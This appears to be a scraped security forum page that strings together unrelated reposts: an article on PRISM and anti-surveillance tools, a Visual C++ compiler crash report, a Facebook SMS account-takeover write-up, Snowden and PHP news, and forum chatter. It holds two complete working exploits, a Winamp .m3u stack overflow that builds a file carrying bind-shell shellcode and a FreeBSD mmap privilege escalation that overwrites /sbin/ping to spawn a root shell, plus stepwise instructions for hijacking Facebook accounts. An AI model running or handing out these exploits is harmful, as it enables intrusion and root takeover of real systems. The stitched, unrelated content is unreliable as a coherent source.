deployment of a massive surveillance system is a critical choice. The government in fact must be sure to be able to prevent foreign intrusions and to avoid the creation of maybe a single point of failure for the overall security of the country. [h=1]Countermeasures[/h] There are various ways to limit the exposure of our digital experience to surveillance and monitoring activities. The US Government and law enforcement could have access to email accounts such as Gmail messages, spy on user communication and discover their habits. Following are a few simple suggestions to avoid monitoring: [h=3]How to anonymize the user’s Internet experience?[/h] Tor Network On the Internet, every machine is identified by its IP address that could be hidden by using anonymizing services and networks such as I2P and Tor network. Usually, the anonymizing process is based on the concept of distribution of routing information. Tor software and the Tor open network help users to avoid surveillance during web browsing, hiding IP address and other identifying information if properly configured. The anonymity is granted through the bouncing of traffic among randomly routedproxy computers before sending it on to its real destination and through the message encryption. Every node of the network manages minimal information to route the packets to the next hop without conserving history on the path. Tor is easy to use. You can download the Tor Browser Bundle, a version of the Firefox browser that automatically connects to the Tor network for anonymous web browsing. Web Proxy To anonymize a user’s identity and its IP address, it is possible to use anonymizing services. The simplest way to do it is through Web-based proxies like Proxify or Hide My Ass. Web proxies are easy to use; just typing a website URL the user could visit it anonymously. Many of them also implement advanced features to encrypt connections or block cookies and JavaScript.Principal drawback is related to data speed and difficulty to access some contents like videos. Of course be aware of the proxy you use, as you could come across honeypots set up to spy on you. VPN Virtual Private Networks represent a valid solution to anonymously surf on internet. Premium VPNs’ paid services dedicate proxy servers for their customers. All client traffic is tunneled to the VPN server via this encrypted connection and from there to the web. This results in actually using the server’s IP to browse the web, instead of the client’s. The principal question is related to the attitude of some VPN providers to maintain server logs that could reveal user’s habits. Of course principal service providers deny it but it is a concrete risk. All the above solutions slow down surfing speed due to the application of tunneling processes and the implementation of cryptographic algorithms. [h=3]Keep private your chat conversations[/h] For every communication channel, there is a more or less secure solution. The events demonstrated that most popular conventional instant messaging services like those offered by Google, Yahoo or Microsoft keep track of your conversations. A typical solution to protect the content of chat communications is to encrypt end to end the messages, an operation that could be done using a self made chat client that enciphers the content to transmit or choosing a chat extension available on the Internet. A very popular cryptographic protocol that provides strong encryption for instant messaging conversations is OTR (“off the record”). It uses a combination of the AES symmetric-key algorithm, the Diffie–Hellman key exchange, and the SHA-1 hash function to protect user privacy. Using the protocol, the server only sees the encrypted conversations, thwarting eavesdropping. Of course, to use OTR, both interlocutors must install an instant messaging software that supports it, such as Pidgin for Windows and Linux systems. [h=3]Keep private your calls[/h] Telephone conversations are exposed to government monitoring, and PRISM is just the last demonstration of the control exercised by authorities for security reasons. Since a few years ago, users were convinced that Internet-based telephony applications represented the most secure way to make calls that avoid wiretapping. Skype was considered the most secure channel since its acquisition by Microsoft. Of course, I’m speaking of a commercial product, avoiding express reference to the various crypto-mobile and applications commercialized at high cost by many security firms. Today one of the most interesting solutions provided on the market is silent Circle. It implements an “end-to-end” encryption, making it impossible for telephone companies to access the user’s call. As reported by the Washington Post: “The client software is open source, and Chris Soghoian, the chief technologist of the American Civil Liberties Union, says it has been independently audited to ensure that it doesn’t contain any “back doors.”" Another interesting software having similar functionalities and that has been independently audited to make sure there are no back doors is Redphone, an application that protects phone calls with end-to-end encryption. It has been developed with financial support from U.S. Taxpayers courtesy of the Open Technology Fund. [h=3]Protecting emails[/h] Another critical aspect is the protection of user’s mail. Commercial PGP or free GPG are considered the standard for email security, and both can be used to both encrypt and decrypt messages avoiding surveillance. GNU Privacy Guard (GnuPG or GPG) is a GPL Licensed alternative to the PGP suite of cryptographic software. GnuPG is compliant with RFC 4880, which is the current IETF standards track specification of OpenPGP. Current versions of PGP (and Veridis’ Filecrypt) are interoperable with GnuPG and other OpenPGP-compliant systems. The main problem for GPG is that novice users could find it complicated to use and not portable. I can promise that in the next few weeks, a product designed by me and my staff that makes the use of GPG on multiple platforms very easy will become available. The solution I designed is very strong and impossible to hack, and it also hides many other surprising features. [h=1]Conclusions[/h] The existence of the PRISM program doesn’t surprise security experts or the common people. From a recent survey, the majority is willing to sacrifice his privacy for homeland security. In the PRISM story, I found personally concerning the approach of the principal IT company that professed totally different privacy respect. My last thought is for surveillance operations elsewhere in the planet that is often synonymous to censorship and persecutions. The laws and regulations of many countries accept these practices to protect the interest of the oligarchy that governs the state. What will happen now that we know that the machines spying on us are also equipped with artificial intelligence and can take action against human beings? [h=1]References[/h] Edward Snowden is the responsible for disclosure of PRISM program Edward Snowden: the whistleblower behind the NSA surveillance revelations | World news | The Guardian NSA slides explain the PRISM data-collection program - The Washington Post NSA Prism program taps in to user data of Apple, Google and others | World news | The Guardian The outsourcing of U.S. intelligence raises risks among the benefits - The Washington Post http://securityaffairs.co/wordpress/13191/laws-and-regulations/the-legislation-of-privacy-new-laws-that-will-change-your-life.html InfoSec Institute Resources – Introduction to Anonymizing Networks – Tor vs I2P NSA Leak Highlights Key Role Of Private Contractors The Legislation of Privacy: New Laws That Will Change Your Life - BackgroundCheck.org Five ways to stop the NSA from spying on you Sursa: InfoSec Institute Resources – PRISM – Facts, Doubts, Laws and Loopholes

[h=2]Crashing the Visual C++ compiler[/h]In September last year I received a programming question regarding multi-level multiple same-base inheritance in C++, under one of my video tutorials on YouTube. I started playing with some tests and went a little too extreme for the likings of Microsoft 32-bit C/C++ Optimizing Compiler (aka Visual C++), which crashed while trying to compile some of the test cases. After some debugging, it turned out that it crashed on a rather nasty memory write operation, which could be potentially exploitable. Given that I was occupied with other work at the time, I decided to report it immediately to Microsoft with just a DoS proof of concept exploit. After 9 months the condition was confirmed to be exploitable and potentially useful in an attack against a build service, but was not considered a security vulnerability by Microsoft on the basis that only trusted parties should be allowed to access a build service, because such access enables one to run arbitrary code anyway (and the documentation has been updated to explicitly state this). [h=2]Heads up![/h]If you are running a build service (Team Foundation Build Service), you might be interested in the following security note in this MSDN article: Installing Team Foundation Build Service increases the attack surface of the computer. Because developers are treated as trusted entities in the build system, a malicious user could, for example, construct a build definition to run arbitrary code that is designed to take control of the server and steal data from Team Foundation Server. Customers are encouraged to follow security best practices as well as deploy defense in-depth measures to ensure that their build environment is secure. This includes developer workstations. For more information regarding security best practices, see the [URL="http://technet.microsoft.com/library/cc184906.aspx"]TechNet Article Security Guidance[/URL]. In other words (keep in mind I'm not a build service expert, but this is how I understand it): Having access to a build service is equivalent to being able to execute arbitrary code with its privileges on the build server. It is best to lock down the build service, so that a potential compromise of a developer's machine doesn't grant the attacker an instant "Administrator" on the build server. You should make sure that the machines used by the programmers are fully trusted and secure (this is an obvious weak spot). Owning one dev's machine allows rapid propagation to both the build server and other programmers' machines that use the same build service (e.g. by hijacking the build process and generating "evil" DLLs/EXEs/OBJs/LIBs instead of what really was supposed to be built), not to mention the testers machines, etc. To sum up, a vulnerability in a compiler doesn't really change the picture that much, since even without exploiting the compiler a person having access to the build service can execute arbitrary code with its privileges. [h=2]The code that crashes[/h]The C++ code snippet capable of crashing the Microsoft C/C++ Optimizing compiler is shown below, with most details included in the comments (note: this bug is scheduled to be fixed in the future): #include <stdio.h> class A { public: int alot[1024]; }; class B : public A { public: int more[1024]; }; class C : public A { public: int more[1024]; }; class DA : public B,C { public: int much[1024]; }; class DB : public B,C { public: int much[1024]; }; #define X(a) \ class a ## AA : public a ## A, a ## B { public: int a ## AA_more[1024]; }; \ class a ## AB : public a ## A, a ## B { public: int a ## AB_more[1024]; } #define Y(a) \ X(a); X(a ## A); X(a ## AA); X(a ## AAA); X(a ## AAAA); \ X(a ## AAAAA); X(a ## AAAAAA); X(a ## AAAAAAA) Y(D); Y(DAAAAAAAA); Y(DAAAAAAAAAAAAAAAA); X(DAAAAAAAAAAAAAAAAAAAAAAAA); // Funny story. Without global it doesn't compile (LNK1248). // But with global it seems to overflow, and it compiles OK. int global[0x12348]; DAAAAAAAAAAAAAAAAAAAAAAAAAA x; int main(void) { printf("%p\n", &x); printf("%p\n", &x.DAAAAAAAAA_more[0]); // <--- customize this with changing // DAA...AA_more to different // amount of 'A' // Funny story no. 2. This above crashes the compiler (MSVC 16.00.30319.01): // test.cpp(61) : fatal error C1001: An internal error has occurred in the compiler. // (compiler file 'msc1.cpp', line 1420) // To work around this problem, try simplifying or changing the program near the locations listed above. // Please choose the Technical Support command on the Visual C++ // Help menu, or open the Technical Support help file for more information // Internal Compiler Error in cl.exe. You will be prompted to send an error report to Microsoft later. // // (2154.dd4): Access violation - code c0000005 (first chance) // First chance exceptions are reported before any exception handling. // This exception may be expected and handled. // eax=00000000 ebx=0044dd34 ecx=0000006c edx=00000766 esi=049a8890 edi=049f3fc0 // eip=73170bb7 esp=0044cd38 ebp=0044cd44 iopl=0 nv up ei pl nz na pe cy // cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010207 // MSVCR100!_VEC_memcpy+0x5a: // 73170bb7 660f7f6740 movdqa xmmword ptr [edi+40h],xmm4 ds:002b:049f4000=???????????????????????????????? // return 0; } As previously mentioned, I didn't really have the time to delve into the details, but it seems the immediate reason of the crash is an invocation of memcpy() with a semi-controlled destination address (EDI is influenced by the source code). If you manage to prove that the bug is exploitable, let me know! [h=2]Vendor communication timeline[/h]2012-09-30: Report sent to Microsoft (DoS only PoC). 2012-10-01: Received ACK + request for further clarification. 2012-10-03: Received information that the crash appears to be exploitable. 2012-10-03: Sent clarification. 2012-11-01: Received confirmation that the issue is exploitable, and that it will not be treated as a security issue, but as a reliability issue. 2012-11-01: Sent description of a potential attack on a build server as a counterargument for it not being a security bug. 2012-11-06: Received ACK + information that the bug will be discussed again with the product team. 2012-12-18: Received "we are still working on it". 2013-01-31: Sent a ping. 2013-06-03: Sent a ping. 2013-06-15: Received information that the bug will be considered as a reliability issue. The build server documentation is updated with a security note. 2013-06-21: Sent a heads up with this blog post. 2013-06-24: Published this blog post. [h=2]Update[/h]A pretty awesome blog post with a gathering of compiler crashes (thx goes to Meredith for pointing this out): 57 Small Programs that Crash Compilers Sursa: gynvael.coldwind//vx.log

[h=2]Hijacking a Facebook Account with SMS[/h] This post will demonstrate a simple bug which will lead to a full takeover of any Facebook account, with no user interaction. Enjoy. Facebook gives you the option of linking your mobile number with your account. This allows you to receive updates via SMS, and also means you can login using the number rather than your email address. The flaw lies in the /ajax/settings/mobile/confirm_phone.php end-point. This takes various parameters, but the two main are code, which is the verification code received via your mobile, and profile_id, which is the account to link the number to. The thing is, profile_id is set to your account (obviously), but changing it to your target’s doesn’t trigger an error. To exploit this bug, we first send the letter F to 32665, which is Facebook’s SMS shortcode in the UK. We receive an 8 character verification code back. We enter this code into the activation box (located here), and modify the profile_id element inside the fbMobileConfirmationForm form. Submitting the request returns a 200. You can see the value of __user (which is sent with all AJAX requests) is different from the profile_id we modified. Note: You may have to reauth after submitting the request, but the password required is yours, not the targets. An SMS is then received with confirmation. Now we can initate a password reset request against the user and get the code via SMS. Another SMS is received with the reset code. We enter this code into the form, choose a new password, and we’re done. The account is ours. [h=4]Fix[/h] Facebook responded by no longer accepting the profile_id parameter from the user. [h=4]Timeline[/h] 23rd May 2013 - Reported 28th May 2013 - Acknowledgment of Report 28th May 2013 - Issue Fixed [h=4]Note[/h] The bounty assigned to this bug was $20,000, clearly demonstrating the severity of the issue. Sursa: http://blog.fin1te.net/post/53949849983/hijacking-a-facebook-account-with-sms

HKSAR Government issues statement on Edward Snowden *************************************************** The HKSAR Government today (June 23) issued the following statement on Mr Edward Snowden: Mr Edward Snowden left Hong Kong today (June 23) on his own accord for a third country through a lawful and normal channel. The US Government earlier on made a request to the HKSAR Government for the issue of a provisional warrant of arrest against Mr Snowden. Since the documents provided by the US Government did not fully comply with the legal requirements under Hong Kong law, the HKSAR Government has requested the US Government to provide additional information so that the Department of Justice could consider whether the US Government's request can meet the relevant legal conditions. As the HKSAR Government has yet to have sufficient information to process the request for provisional warrant of arrest, there is no legal basis to restrict Mr Snowden from leaving Hong Kong. The HKSAR Government has already informed the US Government of Mr Snowden's departure. Meanwhile, the HKSAR Government has formally written to the US Government requesting clarification on earlier reports about the hacking of computer systems in Hong Kong by US government agencies. The HKSAR Government will continue to follow up on the matter so as to protect the legal rights of the people of Hong Kong. Ends/Sunday, June 23, 2013 Issued at HKT 16:05 NNNN Sursa: http://www.info.gov.hk/gia/general/201306/23/P201306230476.htm

Topic stupid => cobra89 - ban (3 zile) Posturi inutile si care nu au legatura cu subiectul - warn.

[h=1]PHP 5.5.0 Release Announcement[/h] The PHP development team is proud to announce the immediate availability of PHP 5.5.0. This release includes a large number of new features and bug fixes. The key features of PHP 5.5.0 include: Added generators and coroutines. Added the finally keyword. Added a simplified password hashing API. Added support for constant array/string dereferencing. Added scalar class name resolution via ::class. Added support for using empty() on the result of function calls and other expressions. Added support for non-scalar Iterator keys in foreach. Added support for list() constructs in foreach statements. Added the Zend OPcache extension for opcode caching. The GD library has been upgraded to version 2.1 adding new functions and improving existing functionality. A lot more improvements and fixes. Changes that affect compatibility: PHP logo GUIDs have been removed. Windows XP and 2003 support dropped. Case insensitivity is no longer locale specific. All case insensitive matching for function, class and constant names is now performed in a locale independent manner according to ASCII rules. For users upgrading from PHP 5.4, a migration guide is available detailing the changes between 5.4 and 5.5.0. For a full list of changes in PHP 5.5.0, see the ChangeLog. Sursa: PHP: PHP 5.5.0 Release Announcement

[h=1]Winamp 5.12 (.m3u) - Stack Based Buffer Overflow[/h] # Exploit Title: Winamp 5.12 .m3u stack based buffer overflow # Date: 16 June 2013 # Exploit Author: superkojiman - http://www.techorganic.com # Vendor Homepage: http://www.winamp.com/ # Software Link: http://www.oldapps.com/winamp.php?old_winamp=211 # Version: 5.12 # Tested on: Windows XP Professional SP2, English # CVE: CVE-2006-0720 # BID: 16785 # # Description from CVE-2006-0720 # Stack-based buffer overflow in Nullsoft Winamp 5.12 and 5.13 # allows user-assisted attackers to cause a denial of service # (crash) and possibly execute arbitrary code via a crafted # .m3u file that causes an incorrect strncpy function call # when the player pauses or stops the file. # # # 1. Launch Winamp # 2. Drag boom.m3u into Winamp window # 3. Check for bind shell on port 28876 # import struct header = "#EXTM3U\n" header += "#EXTINF:1234,Pwnage Rock\n" # NTDisplayString egghunter = ( "\x90" * 64 + "\x66\x81\xca\xff\x0f\x42\x52\x6a\x43\x58" + "\xcd\x2e\x3c\x05\x5a\x74\xef\xb8" + "\x77\x30\x30\x74" + # w00t "\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + "\x90" * 30 ) junk = "\x41" * 262 + "\x90" * 100 + egghunter # bind shell on port 28876 # https://code.google.com/p/w32-bind-ngs-shellcode/ # msfencode -i w32-bind-ngs-shellcode.bin -b "\x00\x0a\x0d\x5c" # [*] x86/shikata_ga_nai succeeded with size 241 (iteration=1) shellcode = ( "w00tw00t" + "\x90" * 239 + "\xbf\x26\x63\xb2\x20\xda\xcc\xd9\x74\x24\xf4\x5a\x33\xc9" + "\xb1\x36\x83\xea\xfc\x31\x7a\x10\x03\x7a\x10\xc4\x96\x83" + "\xe9\x6c\xd2\x95\xd9\xe7\x92\x59\x91\x81\x46\xe9\xcb\x65" + "\xfc\x93\x33\xfe\x34\x54\x7b\x18\x4c\x57\xd2\x70\x9c\xc8" + "\xe6\xb2\x88\x90\x5e\xc5\x3b\x35\xe8\xa6\xb5\x5d\x9f\x5e" + "\x70\x5e\x89\x52\x52\xad\x40\x8d\x73\xde\xf9\x10\x2d\x60" + "\xaf\xc5\x9c\xe1\xa0\xc5\xba\xa9\xb5\x48\xff\xbe\x96\x6f" + "\x87\xc1\xcd\x04\x3c\xe2\x10\xf3\x95\xd3\xc0\x41\x91\x20" + "\x74\x44\x4b\xfc\x40\xea\xa7\x8c\x84\x36\xfb\x1f\xa0\x41" + "\x3e\xc7\x3f\x46\x61\x8c\x8b\xbc\x9f\x7b\x04\x0b\x8b\x2a" + "\x90\x38\xa8\xcd\x4f\x37\x38\xce\x8b\xd6\x12\x51\xad\xd1" + "\x11\x5a\x5f\xbf\xdd\x09\xa0\xef\x89\x38\xde\x31\x45\x36" + "\x6e\x13\x04\x47\x40\x06\xa9\x68\xf4\xd9\x79\x77\x08\x56" + "\xb6\xed\xe7\x3f\x14\xa4\xf8\x6f\xe3\x87\x73\x77\xdd\xd5" + "\x2e\xef\x7d\xb7\xaa\xcf\x0c\x3b\x17\x37\xa4\x6f\xfc\x81" + "\xfd\x86\x02\x59\x85\x65\x21\x36\xdb\xc7\x7b\x7e\x9c\x08" + "\x73\x29\x71\x85\xd3\x87\x8a\x7f\x38\xac\x33\x7c\x29\x78" + "\x44\x83\x55" ) # 022B368C , call ecx , C:\Progam Files\Winamp\pxsdkpls.dll ret = struct.pack("<I", 0x022B368C) # for some reason eip doesn't get overwritten and Winamp # crashes differently unless the 4th byte after ret is # a 0xB0. there's probably an easier way to do this but # this is what the fuzzer found first so... wtf = "\x43\x43\x43\xB0" f = open("boom.m3u", "w") f.write(header + junk + shellcode + ret + wtf) f.close() print "Created boom.m3u" print "1. Open Winamp" print "2. Drag boom.m3u into Winamp window" print "3. Check for bind shell on port 28876" Sursa: Winamp 5.12 (.m3u) - Stack Based Buffer Overflow

[h=1]Memcached Remote Denial of Service PoC[/h] A long time ago, in 2011, a rather serious vulnerability was reported in Memcached. It is now 2013, and the vulnerability still exists in the latest version on the memcached Google Code page. The report is here: https://code.google.com/p/memcached/issues/detail?id=192 Now, as you can see, by sending a specially crafted packet, we can cause Memcached to segfault, and essentially die. Memcached is used by a lot of high profile sites to speed up page load times, and killing it would impact a bit on site performance, so I was rather curious as to why this bug had not yet been killed. As you can see from the report, the vulnerability is trivial to exploit. Just send the magic packet of death and it kills the memcached service. I tried to get remote code execution from it, but had no luck at all. Perhaps one of you might have more luck! memcached ded Exploit code available to download here: killthebox.py As always, responsible use is encouraged. Killing $(big website) memcached might get you in trouble, so don’t do it. As for the memcached devs: You have known about this for two bloody years and never fixed it. This is terribly irresponsible of you. Fix it. Sursa: Memcached Remote Denial of Service PoC | Insecurety Research

[h=2]FreeBSD mmap Privilege Escalation Exploit[/h] /** * FreeBSD privilege escalation CVE-2013-2171 (credits Konstantin Belousov & Alan Cox) * * tested on FreeBSD 9.1 * ref: http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc * * @_hugsy_ * * Syntax : $ id uid=1001(user) gid=1001(user) groups=1001(user) $ gcc -Wall ./mmap.c && ./a.out [+] Saved old '/sbin/ping' [+] Using mmap-ed area at 0x281a4000 [+] Attached to 3404 [+] Copied 4917 bytes of payload to '/sbin/ping' [+] Triggering payload # id uid=0(root) gid=0(wheel) egid=1001(user) groups=1001(user),0(wheel) * * Note : TARGET (default /sbin/ping) will lose its SUID bit on restore, must be restored by hand * */ #include <sys/mman.h> #include <sys/types.h> #include <sys/ptrace.h> #include <sys/wait.h> #include <sys/stat.h> #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <string.h> #include <errno.h> #define LEN 1000*getpagesize() #define TARGET "/sbin/ping" // will lose its SUID bit on restore, must be restored by hand void kaboom(int pid, caddr_t addr) { int nb, i, a, fd, n; char buf[60000] = {0,}; a = i = 0; fd = open(TARGET, O_RDONLY); nb = read(fd, buf, 60000); close(fd); printf("[+] Saved old '%s'\n", TARGET); printf("[+] Using mmap-ed area at %p\n", addr); if (ptrace(PT_ATTACH, pid, 0, 0) < 0) { perror("[-] ptrace(PT_ATTACH) failed"); return; } printf("[+] Attached to %d\n", pid); wait(NULL); fd = open("./sc.c", O_WRONLY|O_CREAT, S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH); write(fd, "#include <stdio.h>\nmain(){ char* s[]={\"/bin/sh\",NULL};setuid(0);execve(s[0],s,0); }\n",84); close(fd); if (system("gcc -o ./sc ./sc.c") != 0) { perror("[-] gcc"); return; } fd = open("./sc", O_RDONLY); while (1) { int a; int n = read(fd, &a, sizeof(int)); if (n <= 0) break; if (ptrace(PT_WRITE_D, pid, addr+i, a) < 0) { perror("[-] ptrace(PT_WRITE_D) failed"); return; } i+=n; } close(fd); printf("[+] Copied %d bytes of payload to '%s'\n", i, TARGET); printf("[+] Triggering payload\n"); system(TARGET); printf("[+] Restoring '%s'\n", TARGET); for (n=0, i=0; n<nb; n++) { if (ptrace(PT_WRITE_D, pid, addr+n, *(buf+n)) < 0) { perror("[-] ptrace(PT_WRITE_D) failed"); return; } } ptrace(PT_DETACH, pid, 0, 0); printf("[+] Done\n"); return; } void dummy(int fd, caddr_t addr) { sleep(1); munmap(addr, LEN); close(fd); return; } int main(int argc, char** argv, char** envp) { int fd = open(TARGET, O_RDONLY); caddr_t addr = mmap(NULL, LEN, PROT_READ, MAP_SHARED, fd, 0); pid_t forked_pid = fork(); switch(forked_pid) { case -1: return -1; case 0: dummy(fd, addr); break; default: munmap(addr, LEN); close(fd); kaboom(forked_pid, addr); wait(NULL); break; } return 0; } Sursa: 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team

Ei au inventat hackingul.

Vedem in weekend

Nu vazusem acel "Self".

Cum il exploatezi?

New Bounty Program Details - Security Research & Defense - Site Home - TechNet Blogs